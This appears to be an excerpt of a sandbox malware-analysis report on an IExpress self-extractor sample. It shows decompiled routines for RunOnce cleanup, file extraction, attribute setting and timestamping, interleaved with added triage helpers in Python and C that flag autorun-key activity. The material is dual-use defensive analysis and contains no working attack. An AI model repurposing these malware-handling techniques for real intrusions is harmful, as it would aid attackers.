						/* "wextract_cleanup0" is the RunOnce value that Microsoft's wextract (IExpress) self-extractor stub
						   registers so that its %TEMP%\IXP000.TMP folder is removed at next logon. Deleting it here is
						   consistent with the preceding routine, which deletes the extracted files in IXP000.TMP itself. */
						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}





[disassembly address column only, 0x00401fee .. 0x00402029; instruction text missing from this listing]

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0040538C,?,?,0040538C), ref: 00402005
                                                                                                                                                                                                                                    • RegDeleteValueA.KERNELBASE(0040538C,wextract_cleanup0,?,?,0040538C), ref: 00402017
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(0040538C,?,?,0040538C), ref: 00402020
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                                                    • API String ID: 849931509-702805525
                                                                                                                                                                                                                                    • Opcode ID: 4a4bbfe9345666091a03c04c6406ee07b10a2f14f218e9796807bdc021751f89
                                                                                                                                                                                                                                    • Instruction ID: 964837390bdcfb9f7028471f109179f02a98b209a827bd19e41bd068bc92d2f3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a4bbfe9345666091a03c04c6406ee07b10a2f14f218e9796807bdc021751f89
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4E04F31950318BBD7218F90EF0EF5A7B2DE700744F2001BABA04B01E0EBB65A24D60D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%
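The two routines above are easiest to reason about from their "APIs" lines: the first resets a file's attributes to FILE_ATTRIBUTE_NORMAL (0x80) and then deletes it inside IXP000.TMP, the second opens HKLM\...\RunOnce with samDesired 0x20006 and deletes the wextract_cleanup0 value. The following Python script is an added triage helper, not code from Joe Sandbox or from the sample: it parses API lines in the format printed here, decodes the hive handle and the REGSAM mask, and flags autorun-key activity and attribute-clear-then-delete sequences. Assumptions, beyond the line format itself: the seven sample lines are copied from this report and embedded as constructed input; calls are taken to be in execution order so that value operations between an autorun-key open and the next RegCloseKey belong to that key; and any subkey under ...\CurrentVersion\Run* is treated as an autorun location.

```python
"""Triage helper for Joe Sandbox "APIs" listings: parse call lines, decode the
registry arguments, and flag autorun-key and file-cleanup activity."""
import re
from dataclasses import dataclass

# One "APIs" line per call, as Joe Sandbox prints it in the routine views:
#   • Func.MODULE(arg,arg,...), ref: <8 hex digits>
API_LINE = re.compile(
    r"^\s*(?:[•*-]\s*)?(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

# Predefined hive handles passed as the first argument of RegOpenKeyEx/RegCreateKeyEx.
HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}
# REGSAM bits (winreg.h); KEY_WRITE == READ_CONTROL | KEY_SET_VALUE | KEY_CREATE_SUB_KEY == 0x20006.
REGSAM_BITS = [
    (0x80000, "WRITE_OWNER"), (0x40000, "WRITE_DAC"), (0x20000, "READ_CONTROL"),
    (0x10000, "DELETE"), (0x0200, "KEY_WOW64_32KEY"), (0x0100, "KEY_WOW64_64KEY"),
    (0x0020, "KEY_CREATE_LINK"), (0x0010, "KEY_NOTIFY"), (0x0008, "KEY_ENUMERATE_SUB_KEYS"),
    (0x0004, "KEY_CREATE_SUB_KEY"), (0x0002, "KEY_SET_VALUE"), (0x0001, "KEY_QUERY_VALUE"),
]
FILE_ATTRIBUTE_NORMAL = 0x80
# Heuristic (assumption): any subkey under ...\CurrentVersion\Run* counts as an autorun location.
AUTORUN_MARKER = "\\currentversion\\run"

# Constructed sample input: the seven API lines shown for the two routines above, copied verbatim.
SAMPLE_API_LINES = r"""
• SetFileAttributesA.KERNELBASE(04F6D228,00000080,?,00000000), ref: 004052F2
• DeleteFileA.KERNELBASE(04F6D228), ref: 004052FA
• LocalFree.KERNEL32(04F6D228,?,00000000), ref: 00405305
• SetCurrentDirectoryA.KERNELBASE(004011FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00405363
• RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0040538C,?,?,0040538C), ref: 00402005
• RegDeleteValueA.KERNELBASE(0040538C,wextract_cleanup0,?,?,0040538C), ref: 00402017
• RegCloseKey.ADVAPI32(0040538C,?,?,0040538C), ref: 00402020
"""


@dataclass
class ApiCall:
    func: str
    module: str
    args: list
    ref: str


def parse_api_lines(text):
    """Return the ApiCall records found in text; non-matching lines (headings, blanks) are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # Joe does not quote string arguments, so a comma inside a path would be split here too.
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("func"), m.group("module"), args, m.group("ref").upper()))
    return calls


def as_hex(token):
    """Joe prints numeric arguments as 8 hex digits and unknown ones as '?'; return int or None."""
    return int(token, 16) if HEX8.match(token) else None


def decode_regsam(mask):
    """Expand a samDesired mask into its REGSAM flag names."""
    return [name for bit, name in REGSAM_BITS if mask & bit]


def hive_name(value):
    return HIVES.get(value, f"0x{value:08X}" if value is not None else "?")


def autorun_findings(calls):
    """Flag opens of autorun keys and the value writes/deletes made on them.
    Assumption: calls are in execution order, so RegDeleteValue/RegSetValueEx between an
    autorun-key open and the next RegCloseKey act on that key (printed handle tokens are not relied on)."""
    findings, open_key = [], None
    for c in calls:
        if c.func.startswith(("RegOpenKeyEx", "RegCreateKeyEx")):
            subkey = c.args[1] if len(c.args) > 1 else ""
            if AUTORUN_MARKER in subkey.lower():
                sam_index = 3 if c.func.startswith("RegOpenKeyEx") else 5  # position of samDesired
                sam = as_hex(c.args[sam_index]) if len(c.args) > sam_index else None
                open_key = hive_name(as_hex(c.args[0])) + "\\" + subkey
                findings.append({"ref": c.ref, "action": "open", "key": open_key,
                                 "access": decode_regsam(sam) if sam is not None else []})
        elif open_key and c.func.startswith(("RegDeleteValue", "RegSetValueEx")):
            action = "delete_value" if c.func.startswith("RegDeleteValue") else "set_value"
            findings.append({"ref": c.ref, "action": action, "key": open_key,
                             "value": c.args[1] if len(c.args) > 1 else "?"})
        elif c.func.startswith("RegCloseKey"):
            open_key = None
    return findings


def file_cleanup_findings(calls):
    """Pair SetFileAttributes(path, FILE_ATTRIBUTE_NORMAL) with a later DeleteFile on the same
    path token: clearing read-only/hidden/system first is what makes the delete succeed."""
    cleared, findings = set(), []
    for c in calls:
        if c.func.startswith("SetFileAttributes") and len(c.args) > 1 and as_hex(c.args[1]) == FILE_ATTRIBUTE_NORMAL:
            cleared.add(c.args[0])
        elif c.func.startswith("DeleteFile") and c.args and c.args[0] in cleared:
            findings.append({"ref": c.ref, "path_token": c.args[0], "attributes_cleared_first": True})
    return findings


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_API_LINES)
    for finding in autorun_findings(calls) + file_cleanup_findings(calls):
        print(finding)
```

On the sample lines the script reports an open of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce with READ_CONTROL, KEY_CREATE_SUB_KEY and KEY_SET_VALUE (that is, KEY_WRITE), a delete of the wextract_cleanup0 value at ref 00402017, and the attribute-clear-then-delete pair at ref 004052FA. Because the page's argument tokens are unquoted, a path containing a comma would be split incorrectly; extend the splitter if that matters for a given report.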

                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E00404CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                                                    				long _t35;
                                                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                                                    				struct HWND__* _t37;
                                                                                                                                                                                                                                    				long _t38;
                                                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                                                    				long _t44;
                                                                                                                                                                                                                                    				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x408004; // 0x8f135e3b
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x4091d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00404E99(_t75);
						L35:
						return E00406CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x408584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x4091e4;
						_t58 = 0x4091e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x4091e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x4091e4;
						_t30 = E00404702( &_v268, 0x4091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0040476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00404980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E004047E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x4093f4 =  *0x4093f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x4091e4;
						_t63 = 0x4091e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x4091e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x4091e4;
						_t30 = E00404702( &_v268, 0x4091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00404C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00404B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t30 = _t44 - 1;
                                                                                                                                                                                                                                    					__eflags = _t30;
                                                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_a4 == 3) {
                                                                                                                                                                                                                                    					_t30 = E00404B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L3;
                                                                                                                                                                                                                                    			}
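The attribute selection in the fragment above, rewritten as a stand-alone C example for reference (added here; it is not code from the sample, from Joe Sandbox, or from the decompiler): choose_attributes reproduces the 0x27/0x80 decision, describe_attributes names the bits so a SetFileAttributesA argument seen in a trace can be read at a glance, and hides_dropped_file flags the HIDDEN case. The function names and the sample inputs are mine; the constant values are the Windows SDK FILE_ATTRIBUTE_* definitions (0x27 = READONLY|HIDDEN|SYSTEM|ARCHIVE, 0x80 = NORMAL).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Windows SDK FILE_ATTRIBUTE_* values (the only ones the fragment touches). */
#define ATTR_READONLY 0x01u
#define ATTR_HIDDEN   0x02u
#define ATTR_SYSTEM   0x04u
#define ATTR_ARCHIVE  0x20u
#define ATTR_NORMAL   0x80u

/* 0x27 in the decompiled code: the four bits the routine lets through. */
#define ATTR_KEPT_MASK (ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM | ATTR_ARCHIVE)

/* Mirrors the fragment's selection logic on the attribute word read from
 * the record at _t75 + 0x1c: take the low 16 bits; if nothing is set,
 * use FILE_ATTRIBUTE_NORMAL, otherwise keep only the bits in 0x27. */
uint32_t choose_attributes(uint32_t stored_word)
{
    uint32_t low16 = stored_word & 0xFFFFu;
    if (low16 == 0)
        return ATTR_NORMAL;
    return low16 & ATTR_KEPT_MASK;
}

/* True when the chosen attributes would hide the dropped file from a
 * default Explorer view (HIDDEN set, with or without SYSTEM). */
int hides_dropped_file(uint32_t attrs)
{
    return (attrs & ATTR_HIDDEN) != 0;
}

/* Bounded append used by describe_attributes (never overruns out[cap]). */
static void append(char *out, size_t cap, size_t *len, const char *s)
{
    if (*len >= cap) return;
    int n = snprintf(out + *len, cap - *len, "%s", s);
    if (n < 0) return;
    *len += (size_t)n < cap - *len ? (size_t)n : cap - *len - 1;
}

/* Render an attribute value the way an analyst reads a SetFileAttributesA
 * argument, e.g. 0x06 -> "HIDDEN|SYSTEM". Bits outside the known set are
 * shown in hex; zero renders as "NONE". Returns the string length. */
size_t describe_attributes(uint32_t attrs, char *out, size_t cap)
{
    static const struct { uint32_t bit; const char *name; } names[] = {
        { ATTR_READONLY, "READONLY" }, { ATTR_HIDDEN,  "HIDDEN"  },
        { ATTR_SYSTEM,   "SYSTEM"   }, { ATTR_ARCHIVE, "ARCHIVE" },
        { ATTR_NORMAL,   "NORMAL"   },
    };
    size_t len = 0;
    if (cap == 0) return 0;
    out[0] = '\0';
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        if (attrs & names[i].bit) {
            if (len) append(out, cap, &len, "|");
            append(out, cap, &len, names[i].name);
        }
    }
    uint32_t unknown = attrs & ~(ATTR_KEPT_MASK | ATTR_NORMAL);
    if (unknown) {
        char hex[16];
        snprintf(hex, sizeof hex, "0x%x", unknown);
        if (len) append(out, cap, &len, "|");
        append(out, cap, &len, hex);
    }
    if (len == 0) append(out, cap, &len, "NONE");
    return len;
}

int main(void)
{
    /* Constructed inputs: attribute words as the routine might read them
     * from the record; not values taken from this sample. */
    const uint32_t samples[] = { 0x0000, 0x0027, 0x0006, 0x10027, 0x0040 };
    char buf[64];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint32_t chosen = choose_attributes(samples[i]);
        describe_attributes(chosen, buf, sizeof buf);
        printf("stored 0x%05x -> SetFileAttributesA(..., 0x%02x) = %s%s\n",
               samples[i], chosen, buf,
               hides_dropped_file(chosen) ? "  [hidden]" : "");
    }
    return 0;
}
```

One edge the decompiled logic admits: a non-zero stored word with none of the four kept bits set (0x40 in the constructed samples) yields an attribute argument of 0 rather than FILE_ATTRIBUTE_NORMAL. The fragment only inspects the return value of SetFileAttributesA, branching to L3 on 0 and returning 1 otherwise, so whether that case succeeds is decided by the API, not by this code.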































Instruction address column for the decompiled function above (one entry per decompiled line, flattened by extraction; 0x00000000 entries carry no instruction address), spanning 0x00404cd0 to 0x00404e98:
0x00404cd0, 0x00404cdb, 0x00404ce0, 0x00404ce2, 0x00404cee, 0x00404cf2, 0x00404d0e, 0x00404d0e,
0x00404d11, 0x00404e83, 0x00404e88, 0x00404e98, 0x00404e98, 0x00404d17, 0x00404d17, 0x00404d1a,
0x00404d2f, 0x00404d2f, 0x00000000, 0x00404d2f, 0x00404d1c, 0x00404d1c, 0x00404d1f, 0x00404dcb,
0x00404dd0, 0x00404dd2, 0x00404ddd, 0x00404ddd, 0x00404de3, 0x00404de8, 0x00404ded, 0x00404ded,
0x00404def, 0x00404df0, 0x00404df0, 0x00404df4, 0x00404df4, 0x00404df6, 0x00404df9, 0x00404dfc,
0x00404dfc, 0x00404dfe, 0x00404dff, 0x00404dff, 0x00404e03, 0x00404e08, 0x00404e0a, 0x00404e0f,
0x00404d03, 0x00404d03, 0x00000000, 0x00404d03, 0x00404e18, 0x00404e20, 0x00404e25, 0x00404e27,
0x00000000, 0x00000000, 0x00404e33, 0x00404e38, 0x00404e3a, 0x00000000, 0x00000000, 0x00404e40,
0x00404e51, 0x00404e56, 0x00404e5b, 0x00404e5e, 0x00000000, 0x00000000, 0x00404e6a, 0x00404e6f,
0x00404e71, 0x00000000, 0x00000000, 0x00404e77, 0x00404e7d, 0x00000000, 0x00404e7d, 0x00404d25,
0x00404d25, 0x00404d28, 0x00404d36, 0x00404d3b, 0x00404d40, 0x00404d40, 0x00404d42, 0x00404d43,
0x00404d43, 0x00404d47, 0x00404d4a, 0x00404d4a, 0x00404d4c, 0x00404d4f, 0x00404d4f, 0x00404d51,
0x00404d52, 0x00404d52, 0x00404d56, 0x00404d5b, 0x00404d5d, 0x00404d62, 0x00000000, 0x00000000,
0x00404d67, 0x00404d6f, 0x00404d74, 0x00404d76, 0x00000000, 0x00000000, 0x00404d7c, 0x00404d84,
0x00404d89, 0x00404d8b, 0x00000000, 0x00000000, 0x00404d94, 0x00404d99, 0x00404d9e, 0x00404da1,
0x00404daa
                                                                                                                                                                                                                                    0x00404daa
                                                                                                                                                                                                                                    0x00404da3
                                                                                                                                                                                                                                    0x00404da3
                                                                                                                                                                                                                                    0x00404da3
                                                                                                                                                                                                                                    0x00404db5
                                                                                                                                                                                                                                    0x00404dbb
                                                                                                                                                                                                                                    0x00404dbd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404dc3
                                                                                                                                                                                                                                    0x00404dc5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404dc5
                                                                                                                                                                                                                                    0x00404dbd
                                                                                                                                                                                                                                    0x00404d2a
                                                                                                                                                                                                                                    0x00404d2a
                                                                                                                                                                                                                                    0x00404d2d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404d2d
                                                                                                                                                                                                                                    0x00404cf8
                                                                                                                                                                                                                                    0x00404cfd
                                                                                                                                                                                                                                    0x00404d02
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00404DB5
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00404DDD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFileItemText
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                    • API String ID: 3625706803-2312194364
                                                                                                                                                                                                                                    • Opcode ID: 257c9b6a3856b41c8a69c04874ddfb44c6bdef15d5f4cd6bd326d1538e73eac5
                                                                                                                                                                                                                                    • Instruction ID: 31e8ee9ec96c77640c407dc2e3c45d8f9ad1bcb24b75663886ce4ee65fd8817f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 257c9b6a3856b41c8a69c04874ddfb44c6bdef15d5f4cd6bd326d1538e73eac5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 244123B62001019BCB219F38ED446B673A5AFC5304B04467FDE86B72D1DA39DE4AC798
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
			E00404C37(signed int __ecx, int __edx, int _a4) {
				// __ecx: index of an entry in a table at 0x408d64 with a 0x18-byte stride;
				// __edx / _a4: packed DOS date and DOS time recorded for that entry.
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				// Entries flagged 1 at offset +0 are skipped. Otherwise the DOS date/time is
				// converted to a FILETIME, interpreted as local time, and shifted to UTC.
				if( *((intOrPtr*)(_t21 + 0x408d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					// Offset +0x10 holds the handle passed to SetFileTime. The same FILETIME is
					// written as creation, last-access and last-write time, so the dropped file's
					// timestamps reflect the package contents rather than the time of extraction.
					_t15 = SetFileTime( *(_t21 + 0x408d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

Instruction addresses mapped from the C listing above (0x00000000 marks a line with no mapped instruction): 0x00404c40, 0x00404c4a, 0x00404c8d, 0x00000000, 0x00404c70, 0x00404c70, 0x00404c7e, 0x00404c86, 0x00000000, 0x00000000, 0x00000000, 0x00404c8a

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00404C54
                                                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00404C66
                                                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00404C7E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2071732420-0
                                                                                                                                                                                                                                    • Opcode ID: de3d8c8ad82764a1cfb484c9646f0635e09601b8f48d0e66528622655dc2b5f2
                                                                                                                                                                                                                                    • Instruction ID: 26a6f2e907af393bf0761dda356fb09445650c1bae6419f8d7bc6e601a313ac9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de3d8c8ad82764a1cfb484c9646f0635e09601b8f48d0e66528622655dc2b5f2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEF090B260520CAFFB24DFB4CD48DBB77ACEB44250B44453FAA16E11D0EA34D924C7A9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%
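The timestamp path in E00404C37 matters for triage: whatever the package stores as a DOS date/time ends up as all three file times of the extracted file, so the dropped artifacts in IXP000.TMP will not carry the extraction time. The following is an added example written for this report, not code from the sample or from Joe Sandbox; it unpacks the DOS date/time layout that DosDateTimeToFileTime consumes, converts it to a FILETIME, and models the three-equal-timestamps write. The sample date/time values are constructed, and the timestamp is treated as UTC (an assumption, since the stub's LocalFileTimeToFileTime step depends on the victim machine's zone).

```python
from datetime import datetime, timedelta, timezone

# FILETIME counts 100 ns intervals since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def dos_datetime_to_datetime(dos_date: int, dos_time: int) -> datetime:
    """Unpack a DOS date/time pair (the layout DosDateTimeToFileTime consumes).

    dos_date: bits 0-4 day, bits 5-8 month, bits 9-15 years since 1980.
    dos_time: bits 0-4 seconds/2, bits 5-10 minute, bits 11-15 hour.
    The pair carries no zone; the stub treats it as local time. Here it is
    taken as UTC (assumption) so results do not depend on the host's zone.
    """
    day = dos_date & 0x1F
    month = (dos_date >> 5) & 0x0F
    year = ((dos_date >> 9) & 0x7F) + 1980
    second = (dos_time & 0x1F) * 2          # DOS time has 2-second resolution
    minute = (dos_time >> 5) & 0x3F
    hour = (dos_time >> 11) & 0x1F
    return datetime(year, month, day, hour, minute, second, tzinfo=timezone.utc)


def datetime_to_filetime(dt: datetime) -> int:
    """Aware datetime -> FILETIME integer (100 ns units since 1601-01-01 UTC)."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME integer -> aware datetime (sub-microsecond part dropped)."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def stub_file_times(dos_date: int, dos_time: int) -> dict:
    """Model E00404C37: one FILETIME is passed for all three SetFileTime slots."""
    ft = datetime_to_filetime(dos_datetime_to_datetime(dos_date, dos_time))
    return {"creation": ft, "last_access": ft, "last_write": ft}


if __name__ == "__main__":
    # Constructed sample: 2023-03-15 10:30:00 packed as DOS date 0x566F, DOS time 0x53C0.
    times = stub_file_times(0x566F, 0x53C0)
    for name, ft in times.items():
        print(f"{name:12s} {ft}  {filetime_to_datetime(ft).isoformat()}")
```

When reviewing the extracted files from a run of this sample, identical creation, access and write times on every dropped file are expected from this routine and are not by themselves evidence of a separate timestomping step.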

                                                                                                                                                                                                                                    C-Code - Quality: 75%
			E0040487A(CHAR* __ecx, signed int __edx) {
				// __ecx: path to open; __edx: open-mode bit flags. Each "sbb reg, reg" below is a
				// branchless conditional that leaves 0 or 0xFFFFFFFF in the register depending on the
				// preceding test; the decompiler's ~(...) expressions stand in for that mask. The
				// pattern (mask & (A - B)) + B reads as "A if the tested bits are set, else B".
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				// dwDesiredAccess: bits 0-1 set -> GENERIC_WRITE (0xC0000000 + 0x80000000 wraps to
				// 0x40000000), otherwise GENERIC_READ (0x80000000).
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				// dwCreationDisposition from bits 0x100, 0x200 and 0x400.
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3; // 0x200 set -> TRUNCATE_EXISTING (5), else OPEN_EXISTING (3)
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4; // 0x200 set -> CREATE_ALWAYS (2), else OPEN_ALWAYS (4)
					} else {
						_t23 = 1; // CREATE_NEW
					}
				}
				// No share mode, no security attributes, FILE_ATTRIBUTE_NORMAL (0x80), no template.
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				// On failure with any disposition other than OPEN_EXISTING, E0040490C (not shown in
				// this listing) is called on the path and the open is retried once unchanged.
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0040490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}
